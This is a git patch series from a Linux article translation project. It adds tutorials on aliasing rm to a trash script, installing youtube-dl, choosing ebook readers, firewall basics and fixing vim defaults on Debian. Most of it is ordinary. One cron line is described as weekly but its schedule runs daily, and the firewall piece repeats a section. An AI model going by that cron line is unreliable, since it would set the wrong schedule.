diff --git a/sources/tech/20171016 Make -rm- Command To Move The Files To -Trash Can- Instead Of Removing Them Completely.md b/sources/tech/20171016 Make -rm- Command To Move The Files To -Trash Can- Instead Of Removing Them Completely.md
new file mode 100644
index 0000000000..17c37f38a1
--- /dev/null
+++ b/sources/tech/20171016 Make -rm- Command To Move The Files To -Trash Can- Instead Of Removing Them Completely.md
@@ -0,0 +1,113 @@
+Make “rm” Command To Move The Files To “Trash Can” Instead Of Removing Them Completely
+======
+Human makes mistake because we are not a programmed devices so, take additional care while using `rm` command and don't use `rm -rf *` at any point of time. When you use rm command it will delete the files permanently and doesn't move those files to `Trash Can` like how file manger does.
+
+Sometimes we delete by mistake and sometimes it happens accidentally, so what to do when it happens? You have to look recovery tools (There are plenty of data recovery tools available in Linux) but we don't know it can able to recover 100% so, how to overcome this?
+
+We have recently published an article about [Trash-Cli][1], in the comment section we got an update about [saferm.sh][2] script from the user called Eemil Lgz which help us to move the files to "Trash Can" instead of deleting them permanently.
+
+Moving files to "Trash Can" is a good idea, that save you when you run `rm` command accidentally but few people would say it's a bad habit of course, if you are not taking care the "Trash Can" it might be accumulated with files & folders after certain duration. In this case i would advise you to create a cronjob as per your wish.
+
+This works on both environments like Server & Desktop. If script detecting **GNOME or KDE or Unity or LXDE** Desktop Environment (DE) then it move files or folders safely to default trash **$HOME/.local/share/Trash/files** else it creates trash folder in your home directory **$HOME/Trash**.
+
+saferm.sh Script is hosted in github, either clone below repository or Create a file called saferm.sh and past the code on it.
+```
+$ git clone https://github.com/lagerspetz/linux-stuff
+$ sudo mv linux-stuff/scripts/saferm.sh /bin
+$ rm -Rf linux-stuff
+
+```
+
+Create a alias on `bashrc` file.
+```
+alias rm=saferm.sh
+
+```
+
+To take this effect, run the following command.
+```
+$ source ~/.bashrc
+
+```
+
+That's it everything is done, now you can perform rm command which automatically move the files to "Trash Can" instead of deleting them permanently.
+
+For testing purpose, we are going to delete file called `magi.txt`, it's clearly saying `Moving magi.txt to $HOME/.local/share/Trash/file`
+```
+$ rm -rf magi.txt
+Moving magi.txt to /home/magi/.local/share/Trash/files
+
+```
+
+The same can be validated through `ls` command or `trash-cli` utility.
+```
+$ ls -lh /home/magi/.local/share/Trash/files
+Permissions Size User Date Modified Name
+.rw-r--r-- 32 magi 11 Oct 16:24 magi.txt
+
+```
+
+Alternatively we can check the same in GUI through file manager.
+[![][3]![][3]][4]
+
+Create a cronjob to remove files from "Trash Can" once in a week.
+```
+$ 1 1 * * * trash-empty
+
+```
+
+`Note` For server environment, we need to remove manually using rm command.
+```
+$ rm -rf /root/Trash/
+/root/Trash/magi1.txt is on . Unsafe delete (y/n)? y
+Deleting /root/Trash/magi1.txt
+
+```
+
+The same can be achieved by trash-put command for desktop environment.
+
+Create a alias on `bashrc` file.
+```
+alias rm=trash-put
+
+```
+
+To take this effect, run the following command.
+```
+$ source ~/.bashrc
+
+```
+
+To know other options for saferm.sh, navigate to help section.
+```
+$ saferm.sh -h
+This is saferm.sh 1.16. LXDE and Gnome3 detection.
+ Will ask to unsafe-delete instead of cross-fs move. Allows unsafe (regular rm) delete (ignores trashinfo).
+ Creates trash and trashinfo directories if they do not exist. Handles symbolic link deletion.
+ Does not complain about different user any more.
+
+Usage: /path/to/saferm.sh [OPTIONS] [--] files and dirs to safely remove
+OPTIONS:
+-r allows recursively removing directories.
+-f Allow deleting special files (devices, ...).
+-u Unsafe mode, bypass trash and delete files permanently.
+-v Verbose, prints more messages. Default in this version.
+-q Quiet mode. Opposite of verbose.
+
+```
+
+--------------------------------------------------------------------------------
+
+via: https://www.2daygeek.com/rm-command-to-move-files-to-trash-can-rm-alias/
+
+作者:[2DAYGEEK][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.2daygeek.com/author/2daygeek/
+[1]:https://www.2daygeek.com/trash-cli-command-line-trashcan-linux-system/
+[2]:https://github.com/lagerspetz/linux-stuff/blob/master/scripts/saferm.sh
+[3]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
+[4]:https://www.2daygeek.com/wp-content/uploads/2017/10/rm-command-to-move-files-to-trash-can-rm-alias-1.png
From 3a6c790314f5fd390af0bd068b1a0db09ca38456 Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 5 Jan 2018 21:28:42 +0800
Subject: [PATCH 013/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Install=20and=20U?=
=?UTF-8?q?se=20YouTube-DL=20on=20Ubuntu=2016.04?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...tall and Use YouTube-DL on Ubuntu 16.04.md | 155 ++++++++++++++++++
1 file changed, 155 insertions(+)
create mode 100644 sources/tech/20171012 Install and Use YouTube-DL on Ubuntu 16.04.md
diff --git a/sources/tech/20171012 Install and Use YouTube-DL on Ubuntu 16.04.md b/sources/tech/20171012 Install and Use YouTube-DL on Ubuntu 16.04.md
new file mode 100644
index 0000000000..dc0391768e
--- /dev/null
+++ b/sources/tech/20171012 Install and Use YouTube-DL on Ubuntu 16.04.md
@@ -0,0 +1,155 @@
+translating by lujun9972
+Install and Use YouTube-DL on Ubuntu 16.04
+======
+
+Youtube-dl is a free and open source command line video download tools that can be used to download video from Youtube and other websites like, Facebook, Dailymotion, Google Video, Yahoo and much more. It is based on pygtk and requires Python to run this software. It supports many operating system including, Windows, Mac and Unix. Youtube-dl supports resuming interrupted downloads, channel or playlist download, add custom title, proxy and much more.
+
+In this tutorial, we will learn how to install and use Youtube-dl and Youtube-dlg on Ubuntu 16.04. We will also learn how to download Youtube video in different quality and formats.
+
+### Requirements
+
+ * A server running Ubuntu 16.04.
+ * A non-root user with sudo privileges setup on your server.
+
+
+
+Let's start by updating your system to the latest version with the following command:
+
+```
+sudo apt-get update -y
+sudo apt-get upgrade -y
+```
+
+After updating, restart the system to apply all these changes.
+
+### Install Youtube-dl
+
+By default, Youtube-dl is not available in the Ubuntu-16.04 repository. So you will need to download it from their official website. You can download it with the curl command:
+
+First, install curl with the following command:
+
+sudo apt-get install curl -y
+
+Next, download the youtube-dl binary:
+
+curl -L https://yt-dl.org/latest/youtube-dl -o /usr/bin/youtube-dl
+
+Next, change the permission of the youtube-dl binary package with the following command:
+
+sudo chmod 755 /usr/bin/youtube-dl
+
+Once youtube-dl is installed, you can proceed to the next step.
+
+### Use Youtube-dl
+
+You can list all the available options with youtube-dl, run the following command:
+
+youtube-dl --h
+
+Youtube-dl supports many Video formats such as Mp4, WebM, 3gp, and FLV. You can list all the available formats for specific Video with the following command:
+
+youtube-dl -F https://www.youtube.com/watch?v=j_JgXJ-apXs
+
+You should see the all the available formats for this video as below:
+```
+[info] Available formats for j_JgXJ-apXs:
+format code extension resolution note
+139 m4a audio only DASH audio 56k , m4a_dash container, [[email protected]][1] 48k (22050Hz), 756.44KiB
+249 webm audio only DASH audio 56k , opus @ 50k, 724.28KiB
+250 webm audio only DASH audio 69k , opus @ 70k, 902.75KiB
+171 webm audio only DASH audio 110k , [[email protected]][1], 1.32MiB
+251 webm audio only DASH audio 122k , opus @160k, 1.57MiB
+140 m4a audio only DASH audio 146k , m4a_dash container, [[email protected]][1] (44100Hz), 1.97MiB
+278 webm 256x144 144p 97k , webm container, vp9, 24fps, video only, 1.33MiB
+160 mp4 256x144 DASH video 102k , avc1.4d400c, 24fps, video only, 731.53KiB
+133 mp4 426x240 DASH video 174k , avc1.4d4015, 24fps, video only, 1.36MiB
+242 webm 426x240 240p 221k , vp9, 24fps, video only, 1.74MiB
+134 mp4 640x360 DASH video 369k , avc1.4d401e, 24fps, video only, 2.90MiB
+243 webm 640x360 360p 500k , vp9, 24fps, video only, 4.15MiB
+135 mp4 854x480 DASH video 746k , avc1.4d401e, 24fps, video only, 6.11MiB
+244 webm 854x480 480p 844k , vp9, 24fps, video only, 7.27MiB
+247 webm 1280x720 720p 1155k , vp9, 24fps, video only, 9.21MiB
+136 mp4 1280x720 DASH video 1300k , avc1.4d401f, 24fps, video only, 9.66MiB
+248 webm 1920x1080 1080p 1732k , vp9, 24fps, video only, 14.24MiB
+137 mp4 1920x1080 DASH video 2217k , avc1.640028, 24fps, video only, 15.28MiB
+17 3gp 176x144 small , mp4v.20.3, [[email protected]][1] 24k
+36 3gp 320x180 small , mp4v.20.3, mp4a.40.2
+43 webm 640x360 medium , vp8.0, [[email protected]][1]
+18 mp4 640x360 medium , avc1.42001E, [[email protected]][1] 96k
+22 mp4 1280x720 hd720 , avc1.64001F, [[email protected]][1] (best)
+
+```
+
+Next, choose any format you want to download with the flag -f as shown below:
+
+youtube-dl -f 18 https://www.youtube.com/watch?v=j_JgXJ-apXs
+
+This command will download the Video in mp4 format at 640x360 resolution:
+```
+[youtube] j_JgXJ-apXs: Downloading webpage
+[youtube] j_JgXJ-apXs: Downloading video info webpage
+[youtube] j_JgXJ-apXs: Extracting video information
+[youtube] j_JgXJ-apXs: Downloading MPD manifest
+[download] Destination: B.A. PASS 2 Trailer no 2 _ Filmybox-j_JgXJ-apXs.mp4
+[download] 100% of 6.90MiB in 00:47
+
+```
+
+If you want to download Youtube video in mp3 audio format, then it is also possible with the following command:
+
+youtube-dl https://www.youtube.com/watch?v=j_JgXJ-apXs -x --audio-format mp3
+
+You can download all the videos of specific channels by appending the channel's URL as shown below:
+
+youtube-dl -citw https://www.youtube.com/channel/UCatfiM69M9ZnNhOzy0jZ41A
+
+If your network is behind the proxy, then you can download the video using --proxy flag as shown below:
+
+youtube-dl --proxy http://proxy-ip:port https://www.youtube.com/watch?v=j_JgXJ-apXs
+
+To download the list of many Youtube videos with the single command, then first save all the Youtube video URL in a file called youtube-list.txt and run the following command to download all the videos:
+
+youtube-dl -a youtube-list.txt
+
+### Install Youtube-dl GUI
+
+If you are looking for a graphical tool for youtube-dl, then youtube-dlg is the best choice for you. youtube-dlg is a free and open source tool for youtube-dl written in wxPython.
+
+By default, this tool is not available in Ubuntu 16.04 repository. So you will need to add PPA for that.
+
+sudo add-apt-repository ppa:nilarimogard/webupd8
+
+Next, update your package repository and install youtube-dlg with the following command:
+
+sudo apt-get update -y
+sudo apt-get install youtube-dlg -y
+
+Once Youtube-dl is installed, you can launch it from Unity Dash as shown below:
+
+[![][2]][3]
+
+[![][4]][5]
+
+You can now easily download any Youtube video as you wish just paste their URL in the URL field shown in the above image. Youtube-dlg is very useful for those people who don't know command line.
+
+### Conclusion
+
+Congratulations! You have successfully installed youtube-dl and youtube-dlg on Ubuntu 16.04 server. You can now easily download any videos from Youtube and any youtube-dl supported sites in any formats and any size.
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.howtoforge.com/tutorial/install-and-use-youtube-dl-on-ubuntu-1604/
+
+作者:[Hitesh Jethva][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.howtoforge.com
+[1]:/cdn-cgi/l/email-protection
+[2]:https://www.howtoforge.com/images/install_and_use_youtube_dl_on_ubuntu_1604/Screenshot-of-youtube-dl-dash.png
+[3]:https://www.howtoforge.com/images/install_and_use_youtube_dl_on_ubuntu_1604/big/Screenshot-of-youtube-dl-dash.png
+[4]:https://www.howtoforge.com/images/install_and_use_youtube_dl_on_ubuntu_1604/Screenshot-of-youtube-dl-dashboard.png
+[5]:https://www.howtoforge.com/images/install_and_use_youtube_dl_on_ubuntu_1604/big/Screenshot-of-youtube-dl-dashboard.png
From 96bb9c66abc8c150958720cef407cb0e9dcbb1c7 Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 5 Jan 2018 21:32:24 +0800
Subject: [PATCH 014/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=207=20Best=20eBook?=
=?UTF-8?q?=20Readers=20for=20Linux?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...20171012 7 Best eBook Readers for Linux.md | 189 ++++++++++++++++++
1 file changed, 189 insertions(+)
create mode 100644 sources/tech/20171012 7 Best eBook Readers for Linux.md
diff --git a/sources/tech/20171012 7 Best eBook Readers for Linux.md b/sources/tech/20171012 7 Best eBook Readers for Linux.md
new file mode 100644
index 0000000000..5198f1bdc0
--- /dev/null
+++ b/sources/tech/20171012 7 Best eBook Readers for Linux.md
@@ -0,0 +1,189 @@
+7 Best eBook Readers for Linux
+======
+**Brief:** In this article, we are covering some of the best ebook readers for Linux. These apps give a better reading experience and some will even help in managing your ebooks.
+
+![Best eBook readers for Linux][1]
+
+Lately, the demand for digital books has increased as people find it more comfortable in reading a book on their handheld devices, Kindle or PC. When it comes to the Linux users, there are various ebook apps that will serve your purpose in reading and organizing your ebook collections.
+
+In this article, we have compiled seven best ebook readers for Linux. These ebook readers are best suited for pdf, epubs and other ebook formats.
+
+## Best eBook readers for Linux
+
+I have provided installation instructions for Ubuntu as I am using Ubuntu right now. If you use [non-Ubuntu Linux distributions][2], you can find most of these eBook applications in the software repositories of your distro.
+
+### 1. Calibre
+
+[Calibre][3] is one of the most popular eBook apps for Linux. To be honest, it's a lot more than just a simple eBook reader. It's a complete eBook solution. You can even [create professional eBooks with Calibre][4].
+
+With a powerful eBook manager and easy to use interface, it features creation and editing of an eBook. Calibre supports a variety of formats and syncing with other ebook readers. It also lets you convert one eBook format to another with ease.
+
+The biggest drawback of Calibre is that it's too heavy on resources and that makes it a difficult choice as a standalone eBook reader.
+
+![Calibre][5]
+
+#### Features
+
+ * Managing eBook: Calibre allows sorting and grouping eBooks by managing metadata. You can download metadata for an eBook from various sources or create and edit the existing field.
+ * Supports all major eBook formats: Calibre supports all major eBook formats and is compatible with various e-readers.
+ * File conversion: You can convert any ebook format to another one with the option of changing the book style, creating a table of content or improving margins while converting. You can convert your personal documents to an ebook too.
+ * Download magazines from the web: Calibre can deliver stories from various news sources or through RSS feed.
+ * Share and backup your library: It gives an option of hosting your eBook collection over its server which you can share with your friends or acccess from anywhere, using any device. Backup and import/export feature allows you to keep your collection safe and easy portability.
+
+
+
+#### Installation
+
+You can find it in the software repository of all major Linux distributions. For Ubuntu, search for it in Software Center or use he command below:
+
+`sudo apt-get install calibre`
+
+### 2. FBReader
+
+![FBReader: eBook reader for Linux][6]
+
+[FBReader][7] is an open source, lightweight, multi-platform ebook reader supporting various formats like ePub, fb2, mobi, rtf, html etc. It includes access to popular network libraries from where you can download ebooks for free or buy one.
+
+FBReader is highly customizable with options to choose colors, fonts, page-turning animations, bookmarks and dictionaries.
+
+#### Features
+
+ * Supports a variety of file formats and devices like Android, iOS, Windows, Mac and more.
+ * Synchronize book collection, reading positions and bookmarks.
+ * Manage your library online by adding any book from your Linux desktop to all your devices.
+ * Web browser access to your stored collection.
+ * Supports storage of books in Google Drive and organizing of books by authors, series or other attributes.
+
+
+
+#### Installation
+
+You can install FBReader ebook reader from the official repository or by typing the below command in terminal.
+```
+sudo apt-get install fbreader
+```
+
+Or, you can grab a .deb package from [here][8] and install it on your Debian based distributions.
+
+### 3. Okular
+
+[Okular][9] is another open source and cross-platform document viewer developed by KDE and is shipped as part of the KDE Application release.
+
+![Okular][10]
+
+#### Features
+
+ * Okular supports various document formats like PDF, Postscript, DjVu, CHM, XPS, ePub and others.
+ * Supports features like commenting on PDF documents, highlighting and drawing different shapes etc.
+ * These changes are saved separately without modifying the original PDF file.
+ * Text from an eBook can be extracted to a text file and has an inbuilt text reading service called Jovie.
+
+
+
+Note: While checking the app, I did discover that the app doesn't support ePub file format in Ubuntu and its derivatives. The other distribution users can still utilize it's full potential.
+
+#### Installation
+
+Ubuntu users can install it by typing below command in Terminal :
+```
+sudo apt-get install okular
+```
+
+### 4. Lucidor
+
+Lucidor is a handy e-book reader supporting epub file formats and catalogs in OPDS formats. It also features organizing the collection of e-books in local bookcase, searching and downloading from the internet and converting web feeds and web pages into e-books.
+
+Lucidor is XULRunner application giving you a look of Firefox with tabbed layout and behaves like it while storing data and configurations. It's the simplest ebook reader among the list and includes configurations like text justifications and scrolling options.
+
+![lucidor][11]
+
+You can look out for the definition from Wiktionary.org by selecting a word and right click > lookup word options. It also includes options to Web feeds or web pages as e-books.
+
+You can download and install the deb or RPM package from [here.][12]
+
+### 5. Bookworm
+
+![Bookworm eBook reader for Linux][13]
+
+Bookworm is another free and open source ebook reader supporting different file formats like epub, pdf, mobi, cbr and cbz. I wrote a dedicated article on features and installation for Bookworm apps, read it here: [Bookworm: A Simple yet Magnificent eBook Reader for Linux][14]
+
+#### Installation
+```
+sudo apt-add-repository ppa:bookworm-team/bookworm
+sudo apt-get update
+sudo apt-get install bookworm
+```
+
+### 6. Easy Ebook Viewer
+
+[Easy Ebook Viewer][15] is another fantastic GTK Python app for reading ePub files. With features like basic chapter navigation, continuing from the last reading positions, importing from other ebook file formats, chapter jumping and more, Easy Ebook Viewer is a simple and minimalist ePub reader.
+
+![Easy-Ebook-Viewer][16]
+
+The app is still in its initial stage and has support for only ePub files.
+
+#### Installation
+
+You can install Easy Ebook Viewer by downloading the source code from [github][17] and compiling it yourself along with the dependencies. Alternatively, the following terminal commands will do the exact same job.
+```
+sudo apt install git gir1.2-webkit-3.0 libwebkitgtk-3.0-0 gir1.2-gtk-3.0 python3-gi
+git clone https://github.com/michaldaniel/Ebook-Viewer.git
+cd Ebook-Viewer/
+sudo make install
+```
+
+After successful completion of the above steps, you can launch it from the Dash.
+
+### 7. Buka
+
+[Buka][18] is mostly an ebook manager with a simple and clean user interface. It currently supports PDF formats and is designed to help the user focus more on the content. With all the basic features of pdf reader, Buka lets you navigate through arrow keys, has zoom options and you can view 2 pages side by side.
+
+You can create separate lists of your PDF files and switch between them easily. Buka also provides a built-in translation tool but you need an active internet connection to use the feature.
+
+![Buka][19]
+
+#### Installation
+
+You can download an AppImage from the [official download page.][20] If you are not aware of it, read [how to use AppImage in Linux][21]. Alternatively, you can install it from the command line:
+```
+sudo snap install buka
+```
+
+### Final Words
+
+Personally, I find Calibre best suited for my needs. Also, Bookworm looks promising to me and I am using it more often these days. Though, the selection of an ebook application totally depends on your preference.
+
+Which ebook app do you use? Let us know in the comments below.
+
+--------------------------------------------------------------------------------
+
+via: https://itsfoss.com/best-ebook-readers-linux/
+
+作者:[Ambarish Kumar][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://itsfoss.com/author/ambarish/
+[1]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/10/best-ebook-readers-linux-800x450.png
+[2]:https://itsfoss.com/non-ubuntu-beginner-linux/
+[3]:https://www.calibre-ebook.com
+[4]:https://itsfoss.com/create-ebook-calibre-linux/
+[5]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/09/Calibre-800x603.jpeg
+[6]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/10/fbreader-800x624.jpeg
+[7]:https://fbreader.org
+[8]:https://fbreader.org/content/fbreader-beta-linux-desktop
+[9]:https://okular.kde.org/
+[10]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/09/Okular-800x435.jpg
+[11]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/09/lucidor-2.png
+[12]:http://lucidor.org/lucidor/download.php
+[13]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/08/bookworm-ebook-reader-linux-800x450.jpeg
+[14]:https://itsfoss.com/bookworm-ebook-reader-linux/
+[15]:https://github.com/michaldaniel/Ebook-Viewer
+[16]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/09/Easy-Ebook-Viewer.jpg
+[17]:https://github.com/michaldaniel/Ebook-Viewer.git
+[18]:https://github.com/oguzhaninan/Buka
+[19]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2017/09/Buka2-800x555.png
+[20]:https://github.com/oguzhaninan/Buka/releases
+[21]:https://itsfoss.com/use-appimage-linux/
From 429d24ad537cbb8da284e9a5e1e5436843c0b40f Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 5 Jan 2018 21:34:50 +0800
Subject: [PATCH 015/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20What=20is=20a=20f?=
=?UTF-8?q?irewall=3F?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
sources/tech/20171011 What is a firewall.md | 79 +++++++++++++++++++++
1 file changed, 79 insertions(+)
create mode 100644 sources/tech/20171011 What is a firewall.md
diff --git a/sources/tech/20171011 What is a firewall.md b/sources/tech/20171011 What is a firewall.md
new file mode 100644
index 0000000000..fe1142b8a4
--- /dev/null
+++ b/sources/tech/20171011 What is a firewall.md
@@ -0,0 +1,79 @@
+What is a firewall?
+======
+Network-based firewalls have become almost ubiquitous across US enterprises for their proven defense against an ever-increasing array of threats.
+
+A recent study by network testing firm NSS Labs found that up to 80% of US large businesses run a next-generation firewall. Research firm IDC estimates the firewall and related unified threat management market was a $7.6 billion industry in 2015 and expected to reach $12.7 billion by 2020.
+
+ **[ If you 're upgrading, here's [What to consider when deploying a next generation firewall][1].]**
+
+### What is a firewall?
+
+Firewalls act as a perimeter defense tool that monitor traffic and either allow it or block it. Over the years functionality of firewalls has increased, and now most firewalls can not only block a set of known threats and enforce advanced access control list policies, but they can also deeply inspect individual packets of traffic and test packets to determine if they're safe. Most firewalls are deployed as network hardware that processes traffic and software that allow end users to configure and manage the system. Increasingly, software-only versions of firewalls are being deployed in highly virtualized environments to enforce policies on segmented networks or in the IaaS public cloud.
+
+Advancements in firewall technology have created new options firewall deployments over the past decade, so now there are a handful of options for end users looking to deploy a firewall. These include:
+
+### Stateful firewalls
+
+When firewalls were first created they were stateless, meaning that the hardware that the traffic traverse through while being inspected monitored each packet of network traffic individually and either blocking or allowing it in isolation. Beginning in the mid to late 1990s, the first major advancements in firewalls was the introduction of state. Stateful firewalls examine traffic in a more holistic context, taking into account the operating state and characteristics of the network connection to provide a more holistic firewall. Maintaining this state allows the firewall to allow certain traffic to access certain users while blocking at same traffic to other users, for example.
+
+### Next-generation firewalls
+
+Over the years firewalls have added myriad new features, including deep packet inspection, intrusion detection and prevention and inspection of encrypted traffic. Next-generation firewalls (NGFWs) refer to firewalls that have integrated many of these advanced features into the firewall.
+
+### Proxy-based firewalls
+
+These firewalls act as a gateway between end users who request data and the source of that data. All traffic is filtered through this proxy before being passed on to the end user. This protects the client from exposure to threats by masking the identity of the original requester of the information.
+
+### Web application firewalls
+
+These firewalls sit in front of specific applications as opposed to sitting on an entry or exit point of a broader network. Whereas proxy-based firewalls are typically thought of as protecting end-user clients, WAFs are typically thought of as protecting the application servers.
+
+### Firewall hardware
+
+Firewall hardware is typically a straightforward server that can act as a router for filtering traffic and running firewall software. These devices are placed at the edge of a corporate network, between a router and the Internet service provider's connection point. A typical enterprise may deploy dozens of physical firewalls throughout a data center. Users need to determine what throughput capacity they need the firewall to support based on the size of the user base and speed of the Internet connection.
+
+### Firewall software
+
+Typically end users deploy multiple firewall hardware endpoints and a central firewall software system to manage the deployment. This central system is where policies and features are configured, where analysis can be done and threats can be responded to.
+
+### Next-generation firewalls
+
+Over the years firewalls have added myriad new features, including deep packet inspection, intrusion detection and prevention and inspection of encrypted traffic. Next-generation firewalls (NGFWs) refer to firewalls that have integrated many of these advanced features, and here is a description of some of them.
+
+### Stateful inspection
+
+This is the basic firewall functionality in which the device blocks known unwanted traffic
+
+### Anti-virus
+
+This functionality that searches for known virus and vulnerabilities in network traffic is aided by the firewall receiving updates on the latest threats and being constantly updated to protect against them.
+
+### Intrusion Prevention Systems (IPS)
+
+This class of security products can be deployed as a standalone product, but IPS functionality is increasingly being integrated into NGFWs. Whereas basic firewall technologies identify and block certain types of network traffic, IPS uses more granular security measures such as signature tracing and anomaly detection to prevent unwanted threats from entering corporate networks. IPS systems have replaced the previous version of this technology, Intrusion Detection Systems (IDS) which focused more on identifying threats rather than containing them.
+
+### Deep Packet Inspection (DPI)
+
+DPI can be part of or used in conjunction with an IPS, but its nonetheless become an important feature of NGFWs because of the ability to provide granular analysis of traffic, most specifically the headers of traffic packets and traffic data. DPI can also be used to monitor outbound traffic to ensure sensitive information is not leaving corporate networks, a technology referred to as Data Loss Prevention (DLP).
+
+### SSL Inspection
+
+Secure Sockets Layer (SSL) Inspection is the idea of inspecting encrypted traffic to test for threats. As more and more traffic is encrypted, SSL Inspection is becoming an important component of DPI technology that is being implemented in NGFWs. SSL Inspection acts as a buffer that unencrypts the traffic before it's delivered to the final destination to test it.
+
+### Sandboxing
+
+This is one of the newer features being rolled into NGFWs and refers to the ability of a firewall to take certain unknown traffic or code and run it in a test environment to determine if it is nefarious.
+
+
+--------------------------------------------------------------------------------
+
+via: https://www.networkworld.com/article/3230457/lan-wan/what-is-a-firewall-perimeter-stateful-inspection-next-generation.html
+
+作者:[Brandon Butler][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.networkworld.com/author/Brandon-Butler/
+[1]:https://www.networkworld.com/article/3236448/lan-wan/what-to-consider-when-deploying-a-next-generation-firewall.html
From 23ef82d1a848d4ce2cd4f1b9a29e8ab8e4bd7921 Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 5 Jan 2018 21:37:42 +0800
Subject: [PATCH 016/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Fixing=20vim=20in?=
=?UTF-8?q?=20Debian=20=E2=80=93=20There=20and=20back=20again?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...ng vim in Debian - There and back again.md | 57 +++++++++++++++++++
1 file changed, 57 insertions(+)
create mode 100644 sources/tech/20171016 Fixing vim in Debian - There and back again.md
diff --git a/sources/tech/20171016 Fixing vim in Debian - There and back again.md b/sources/tech/20171016 Fixing vim in Debian - There and back again.md
new file mode 100644
index 0000000000..0b67edcf63
--- /dev/null
+++ b/sources/tech/20171016 Fixing vim in Debian - There and back again.md
@@ -0,0 +1,57 @@
+Fixing vim in Debian – There and back again
+======
+I was wondering for quite some time why on my server vim behaves so stupid with respect to the mouse: Jumping around, copy and paste wasn't possible the usual way. All this despite having
+```
+ set mouse=
+```
+
+in my `/etc/vim/vimrc.local`. Finally I found out why, thanks to bug [#864074][1] and fixed it.
+
+![][2]
+
+The whole mess comes from the fact that, when there is no `~/.vimrc`, vim loads `defaults.vim` **after** ` vimrc.local` and thus overwriting several settings put in there.
+
+There is a comment (I didn't see, though) in `/etc/vim/vimrc` explaining this:
+```
+" Vim will load $VIMRUNTIME/defaults.vim if the user does not have a vimrc.
+" This happens after /etc/vim/vimrc(.local) are loaded, so it will override
+" any settings in these files.
+" If you don't want that to happen, uncomment the below line to prevent
+" defaults.vim from being loaded.
+" let g:skip_defaults_vim = 1
+```
+
+
+I agree that this is a good way to setup vim on a normal installation of Vim, but the Debian package could do better. The problem is laid out clearly in the bug report: If there is no `~/.vimrc`, settings in `/etc/vim/vimrc.local` are overwritten.
+
+This is as counterintuitive as it can be in Debian - and I don't know any other package that does it in a similar way.
+
+Since the settings in `defaults.vim` are quite reasonable, I want to have them, but only fix a few of the items I disagree with, like the mouse. At the end what I did is the following in my `/etc/vim/vimrc.local`:
+```
+if filereadable("/usr/share/vim/vim80/defaults.vim")
+ source /usr/share/vim/vim80/defaults.vim
+endif
+" now set the line that the defaults file is not reloaded afterwards!
+let g:skip_defaults_vim = 1
+
+" turn of mouse
+set mouse=
+" other override settings go here
+```
+
+
+There is probably a better way to get a generic load statement that does not depend on the Vim version, but for now I am fine with that.
+
+--------------------------------------------------------------------------------
+
+via: https://www.preining.info/blog/2017/10/fixing-vim-in-debian/
+
+作者:[Norbert Preining][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.preining.info/blog/author/norbert/
+[1]:https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=864074
+[2]:https://www.preining.info/blog/wp-content/uploads/2017/10/fixing-debian-vim.jpg
From 55752887f321cf01a3be5ab7e991d52e0c8191e0 Mon Sep 17 00:00:00 2001
From: darksun
Date: Fri, 5 Jan 2018 21:41:30 +0800
Subject: [PATCH 017/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=2010=20Free=20Linux?=
=?UTF-8?q?=20Productivity=20Apps=20You=20Haven=E2=80=99t=20Heard=20Of?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
... Productivity Apps You Haven-t Heard Of.md | 101 ++++++++++++++++++
1 file changed, 101 insertions(+)
create mode 100644 sources/tech/20171009 10 Free Linux Productivity Apps You Haven-t Heard Of.md
diff --git a/sources/tech/20171009 10 Free Linux Productivity Apps You Haven-t Heard Of.md b/sources/tech/20171009 10 Free Linux Productivity Apps You Haven-t Heard Of.md
new file mode 100644
index 0000000000..ed77417a7c
--- /dev/null
+++ b/sources/tech/20171009 10 Free Linux Productivity Apps You Haven-t Heard Of.md
@@ -0,0 +1,101 @@
